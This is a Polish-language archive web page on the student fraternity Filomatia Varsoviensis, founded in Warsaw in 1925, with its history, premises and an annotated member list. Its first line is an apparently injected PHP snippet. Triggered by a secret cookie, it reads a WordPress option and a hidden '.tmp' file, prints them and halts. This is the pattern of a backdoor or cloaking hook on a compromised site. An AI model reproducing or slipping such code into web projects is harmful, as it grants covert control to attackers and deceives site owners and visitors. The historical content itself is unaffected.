if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Filomatia Varsoviensis

Dekiel Stanisława Jakóbisiaka Nazwa:
Polska Korporacja Akademicka Filomatia Varsoviensis
Siedziba:
Warszawa
Data powstania:
III 1925 r.
Barwy:
ciemnowiśniowa – srebrna – karmazynowa
Barwy:
„Semper surgere” („Zawsze się wznosić”)

Rys historyczny

Banda rycerska z herbem Zbigniewa Karwowskiego

Filomatia Varsoviensis została założona w marcu 1925 r. przyjmując za wzór związki wileńskich filomatów i filaretów. Założyciele byli aktywnie w istniejącej wcześniej Korporacji Slavia. Od dnia 24 VI 1925 r. (?) Filomatia kandydowała pod opieką Korporacji Sarmatia w Związku Polskich Korporacji Akademickich, a dnia 16 XII 1926 r. uzyskała prawa
członka rzeczywistego (data starszeństwa związkowego: 24 VI 1925 r.). Dnia 3 czerwca 1928 r. poświęcono sztandar Korporacji, a w 1931 r. (?) powołano Związek Seniorów.

Filomatia zawarła w 1937 r. kartel na pięć lat z K! Filomatia Vilnensis z Wilna.

Kwatera Filomatii, Warszawa druga połowa lat 20-tych (?).

Siedziby Korporacji znajdowała się między innymi przy: ul. Czerniakowskiej 196 (1925/26), ul. Złotej 14 w Szkole Śródmieścia Polskiej Macierzy Szkolnej (1927/28), ul. Grójeckiej 30/22 (1928/29) oraz ul. Stalowej 5 (1929/30, 1930/31, 1931/32, 1932/33).

Filomatia Varsoviensis na kwaterze, Warszawa druga połowa lat 20-tych (?)

Całkowita ustalona, choć bardzo niekompletna imienna lista członków Filomatii obejmuje 84 nazwiska, w tym sześciu członków honorowych (wykaz obejmuje jednak niemal wyłącznie osoby aktywne w latach 1925-33).

W pierwszych dziesięcioleciach po wojnie odbywały się nieoficjalne spotkania niewielkiej grupy członków Korporacji.

Lista członków

Poniższa, niekompletna lista członków Filomatii Varsoviensis obejmuje kilkadziesiąt nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Jan Danielecki, ( - 22 maja 1930) mgr farmacji, dyrektor “Jurostatu” w Kijowie, dyrektor Hurtowni Aptekarzy Polskich Sp. Akc., prezes Polskiego Związku Drogistów Hurtowych, pełnomocnik Czerwonego Krzyża, członek Stowarzyszenia Kupców Polskich, Filister honorowy Filomatii Varsoviensis, pochowany w grobie rodzinnym na warszawskich Powązkach

  Prawd. Michał Dmowski, lata 30-te (?).

 2. Michał Dmowski (1873 - 13 marca 1938) ukończył seminarium duchowne w Warszawie, ks. katolicki, wikariusz parafii św. Aleksandara i Leszno w Warszawie 1902-04, administrator kolejno parafii Koszery, Orłów i Rydułtowo 1904-15, od 1915 pełnił posługę w Sankt Petersburgu, początkowo jako ekonom Akadmii Duchownej 1915-18, a następnie jako duszpastrzez w kościele św. Bonifacego, w 1925 areztowany i osadzony w więzieniu na Szpalerce, skazany na śmierć, w 1926 w drodze wymiany więźniów wrócił do Polski, administrator parafii św. Karola Bromeusza w Warszawie 1927-34, a następnie kapelan przy kościele św. Wincentego a Paulo na cmentarzu na Bródnie 1934-36, Filister honorowy Filomatii Varsoviensis, pochowany na cmentarzu na Bródnie

 3. Eugeniusz de Henning-Michaelis, (29 grudnia 1863 w Modlinie - wrzesień 1939 w Sinołęce) od 1885 oficer rosyjskiej artylerii, absolwent Akademii Artylerii i Akademii Sztabu Generalnego w St. Petersburgu, uczestnik interwencji Rosji w Chinach i w wojnie rosyjsko-japońskiej 1904-05, I wojnie światowej dowódca dywizji piechoty i korpusu armijnego na froncie niemieckim i austriackim w walkach na terenach Polski i Ukrainy, generał artylerii armii rosyjskiej armii, po rewolucji 1917 organizator i dowódca III Korpusu Polskiego na Ukrainie 1917-1918, od stycznia 1919 w WP, przewodniczący Rady Wojennej przy Ministerstwie Spraw Wojskowych 1919-sierpień 1920, od czerwca 1919 generał dywizji WP, w lipcu i sierpniu 1920 kierował Komitetem Fortyfikacyjnym w obronie Warszawy, od sierpnia 1920 do sierpnia 1921 wiceminister spraw wojskowych, a następnie do maja 1922 szef Administracji Armii, od 1923 w stanie spoczynku, działacz społeczno-polityczny opozycyjny wobec sanacji, filister honorowy Filomatii Varsoviensis
 4. Łukasz Krycki, inż., Filister honorowy Filomatii
 5. Tadeusz Szczepański, prof. dr, Filister honorowy Filomatii Varsoviensis
 6. Aleksander Załęski, inż., Filister honorowy Filomatii Varsoviensis

Członkowie rzeczywiści

  Władysław Barański, 1931/32 r.

 1. Władysław Barański, student PW, akt. 1929-32, sekretarz 1929/30, wiceprezes zewn. 1931/32, prezes WKM-u sem. zim. 1932/33 (po Białobrzeskim, od X Zjazdu ZPKA), skarbnik ZPKA 1931-32 (XI kadencja)

  Janusz Białobrzeski, ok. 1928 r.

 2. Janusz Białobrzeski, ( - 2003) brat Stefana (Filomatia Varsoviensis), student WSH, akt. 1927/28-28

  Stefan Białobrzeski, ok. 1930 r.

 3. Stefan Białobrzeski, (1903-1942) brat Janusza (Filomatia Varsoviensis), student WSH, akt. 1928-31, prezes 1929/30, olderman 1930/31, wiceprezes wewn. 1931/32, skarbnik ZPKA 1928-30 (VIII kadencja) oraz 1930 (IX kadencja), prezes WKM-u sem. zim. 1932/33 (do X Zjazdu ZPKA)

 4. Jan Brzozowski, student WSH, akt. 1931
 5. Stefan Burzacki, student WSH, akt. 1931
 6. Jerzy Buszkowski, (1904-1979) student WSH, akt. 1925-32, sekretarz 1925/26, z-ca sekretarza sem. zim. 1926/27
 7. Jarosław Choynowski (Chojnowski), student WSH, akt. 1930-32, sekretarz WKM-u sem. zim. 1932/33
 8. Zygmunt Czarnecki, student WSH, akt. 1930-32, sekretarz 1931/32, I wiceprezes 1932/33
 9. Tadeusz Danielecki, student WSH, akt. 1927/28-30, sekretarz 1930/31
 10. Włodzimierz Domaniewski, ( - lata 80-te) student PW, akt. 1925-32, wiceprezes 1927/28, prezes 1930/31, prezes 1932/33
 11. Michał Doroszewski, student UW, akt. 1930-32
 12. Marian Józef Dubicki, (4 sierpnia 1903 w Tłumaczu na Podolu- ) członek POW, żołnierz wojny polsko-rosyjskiej 1920, absolwent gimnazjum 1922, początkowo studiował w Warszawie i należał do Filomatii Varsoviensis, wystąpił (?), później student i absolwent 1930 med. UJK, założyciel Obotritii, ginekolog-położnik, starszy asystent Kliniki Położniczej we Lwowie, po wojnie lekarz w Krakowie
 13. Henryk Dudziński, student UW, akt. 1931-32
 14. Felicjan Dulowski, student WSH, akt. 1931-32, olderman WKM-u sem. zim. 1932/33
 15. Tadeusz Dzierżanowski, student WSH, akt. 1927/28
 16. Tadeusz Dziewicki, student WSH, akt. 1929-32
 17. Lucjan Fedorowicz, student WSH, akt. 1925-29

  Wacław Frajndt, 1930/31 r.

 18. Wacław Frajndt, (28 września 1906 w Warszawie - 1940 w Katyniu), s. Ludwika (maszynisty) i Marii ze Skowrońskich, student i absolwent 1933 WSH, akt. 1929-32, II wiceprezes 1932/33, skarbnik ZPKA 1930-31 (X kadencja), po studiach urzędnik w poznańskim oddziale Banku Handlowego w Warszawie, absolwent kursu w Batalionie Podchorążych Rezerwy Piechoty OK X w Nisku, ppor. rez., przydzielony do 69 Pułku Piechoty, w niewoli sowieckiej, zamordowany przez NKWD

 19. Tadeusz Furgo, student UW, akt. 1925-31, olderman 1929/30
 20. Mieczysław Gogolewski, student WSH, akt. 1930
 21. Stanisław Gogolewski, student WSH, akt. 1930
 22. Witold Górski, student WSH, akt. 1930-32
 23. Zygmunt Gruszecki, student SNP, akt. 1930, sekretarz 1932/33
 24. Stanisław Gryniewicz, student SNP, student UW (1932), akt. 1931-32
 25. Karol Hempfler, olderaman WKM sem. let. 1937/38
 26. Edward Hess, student WSH, akt. 1930-31
 27. Rafał Jankowski, student WSH, akt. 1930-32

  Stanisław Jakóbisiak, ok. 1930 r.

 28. Stanisław Jakóbisiak, ( - 2000) student UW, akt. 1930-32, mgr praw UW

  Zbigniew Karwowski, koniec lat 20-tych (?).

 29. Zbigniew Karwowski, (1905-1960) student WSH, akt. 1927-31, sekretarz sem. let. 1927/28 oraz 1928/29, wiceprezes 1930/31

 30. Bolesław Knebel, student WSH, akt. 1930-32
 31. Tadeusz Krycki, student WSH, akt. 1925-29, wiceprezes sem. zim. 1926/27
 32. Jan Kubaszewski, ( - 1968) student PW, akt. 1931-32
 33. Stanisław Kurnicki, student UW, akt. 1929-30
 34. Franciszek Kwasowiec, student UW, później USB (1931), akt. 1930-31
 35. Zbigniew Kwiatkowski, student PW, fuksmajor 1932/33
 36. Wiktor Langer, student WSH, akt. 1925-30, olderman sem. let. 1927/28
 37. Jan Łada, student WSH, akt. 1929-30
 38. Edward Łuczyński, student WSH, akt. 1927/28
 39. Tadeusz Majcherczyk, student WSH, akt. 1932
 40. Edmund Misztal, student SNP, akt. 1931-32
 41. Maciej Mojnowski, (?)
 42. Zbigniew Niwiński, akt. 1925
 43. Cezary Nowakowski, student PW, akt. 1927/28-32
 44. Lotar Obermeyer, student WSH, akt. 1930-32
 45. Bohdan Olexy, student WSH, akt. 1925-31, wiceprezes 1925/26
 46. Jerzy Osiński, student UW, akt. 1928-32
 47. Iwon Ostromęcki, student UW, akt. 1929-30
 48. Andrzej Pasierbiński, student UJ, akt. 1925-30
 49. Zdzisław Perkowski, (1908 w Warszawie - 27 maja 1930 w Warszawie) s. Jana (urzędnika państwowego) i Zofii z d. Rusińska, student PW, akt. 1929, zmarł w związku z przeziębieniem i infekcją płucną, pochowany na warszawskich Powązkach (kwatera 400) [Źródła (poza wskazanymi poniżej spisu członków): relacja brata Stefana Perkowskiego]
 50. Zdzisław Pogonowski, student PW, akt. 1925-32, sekretarz sem. zim. 1926/27, prezes 1928/29, pochowany na Powązkach
 51. Eugeniusz Preidel, student WSH, później UW (1932), akt. 1929-32
 52. Tadeusz Przybyłowski, student UW, akt. 1932
 53. Bronisław Puchalski, student PW, akt. 1925-29, wiceprezes 1928/29
 54. Henryk Rieff, student WSH, akt. 1930-32
 55. Jan Rosiński, student WSH, akt. 1931-32
 56. Marian Sadoś, student WSH, akt. 1930-32
 57. Tadeusz Sawicki, student WSH, akt. 1925-28
 58. Tadeusz Sieradzki, student WSH, akt. 1932
 59. Mieczysław Skolimowski, (19 grudnia 1903 w Siedlcach - 1940 w Katyniu), s. Józefa i Salomei z Maciejczyków, student i absolwent WSH, akt. 1925-32, absolwent Szkoły Podchorążych Rezerwy Piechoty nr 9 w Berezie Kartuskiej 1928, ppor. rez., przydzielony do 22 Pułku Piechoty, w niewoli sowieckiej, zamordowany przez NKWD
 60. Feliks Skwarski, student WSH, akt. 1932
 61. Mieczysław Stankiewicz, student WSH, akt. 1929-32
 62. Sławomir Stankiewicz, student WSH, akt. 1927-30
 63. Mirosław Stecki, student WSH, akt. 1927-32
 64. Zbigniew Stecki, student WSH, akt. 1927-32
 65. Jerzy Szałas, student WSH, akt. 1930-32
 66. Bolesław Szczerbiński, student WSH, akt. 1925-32
 67. Ferdynand Szmoniewski, student WSH, akt. 1931-32
 68. Janusz Szymański, (23 kwietnia 1913 w Piotrkowie Trybunalskim - 4 lutego 2004 w Szczecinie) s. Karola i Bronisławy z d. Smelczyńska, absolwent Gimnazjum im. Bolesława Chrobrego w Piotrkowie 1931, student i absolwent prawa UW 1931-35 (mgr praw), akt. 1932, członek Młodzieży Wszechpolskiej, Obozu Wielkiej Polski, ONR (związany z grupą “ABC”), po zakończeniu aplikacji został asesorem sądowym w Płocku, a następnie pracował jako podprokurator w Mławie, po rozpoczęciu II wojny światowej powrócił do Piotrkowa, w 1941 zaczął pracować w Prokuraturze Okręgowej w charakterze asesora-tłumacza, w czasie okupacji w konspiracyjnym Związku Jaszczurczym, a następnie NSZ, członek Organizacji Polskiej, kierownik polityczny Obozu Narodowego w Piotrkowie, redaktor naczelny czasopisma “Naród”, komisarz piotrkowskich struktur Służby Cywilnej Narodu ps. “Narocz”, po wojnie rozpoczął praktykę adwokacką w Szczecinie, w 1953 aresztowany przez UB za działalność konspiracyjną w czasie wojny, w czasie brutalnych przesłuchań załamał się psychicznie i postanowieniem Generalnej Prokuratury zwolniony z aresztu, pochowany na Cmentarzu Centralnym w Szczecinie (kw. 98C, rz. 9, gr. 1)
  [Źródła (poza wskazanymi poniżej spisu członków): relacja Roberta Rudnickiego]

 69. Jan Świątkiewicz, student PW, akt. 1927/28-32, wiceprezes 1929/30
 70. Kazimierz Trybulski, prezes 1925/26
 71. Stefan Twardowski, student WSH, akt. 1931-32
 72. Stanisław Wejdeman (Weideman), (3 maja 1908 w Warszawie - 22 września 1984 w Gdańsku), s. Zygmunta i Sabiny z d. Ostrowskiej, absolwent Gimnazjum im. L. Lorentza w Warszawie 1929, absolwent WSH 1933, akt. 1929-32, prezes 1931/32, olderman 1932/33, wiceprezes WKM-u sem. zim. 1932/33, mgr ekonomii SGH 1949, po wojnie pracował na stanowiskach kierowniczych, m.in. odbudował i uruchomił Fabrykę Środków Odżywczych w Oliwie (dawny Oetker) 1945/46, działacz “Społem” i spółdzielczości mieszkaniowej, radny miasta Gdańska 1978-84, pochowany na cmentarzu w Oliwie, odznaczony Krzyżem Kawalerskim OOP, złotą odznaką “Zasłużony działacz ruchu spółdzielczego”, “Zasłużony dla Społem”
 73. Jan Kazimierz Wierzbicki, student WSH, akt. 1925-31, prezes sem. zim. 1926/27, prezes sem. let. 1927/28, olderman 1931/32
 74. Jerzy Wiland, student UJ (Kraków), student AG (1930, Kraków), akt. 1925-32
 75. Romuald Wojtaszczyk, student WSH, akt. 1927/28
 76. Józef Wygonowski, student UW, akt. 1927/28-32
 77. Jan Zajder, student WSH, akt. 1930-32
 78. Jan Załęski, student WSH, akt. 1925-32

Listę członków opracowano na podstawie:

1) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1925-1933,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Filomatia Varsoviensis.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 30 IV 2018 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka Filomatia Varsoviensis, (na:) www.archiwumkorporacyjne.pl, stan 30 IV 2018 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }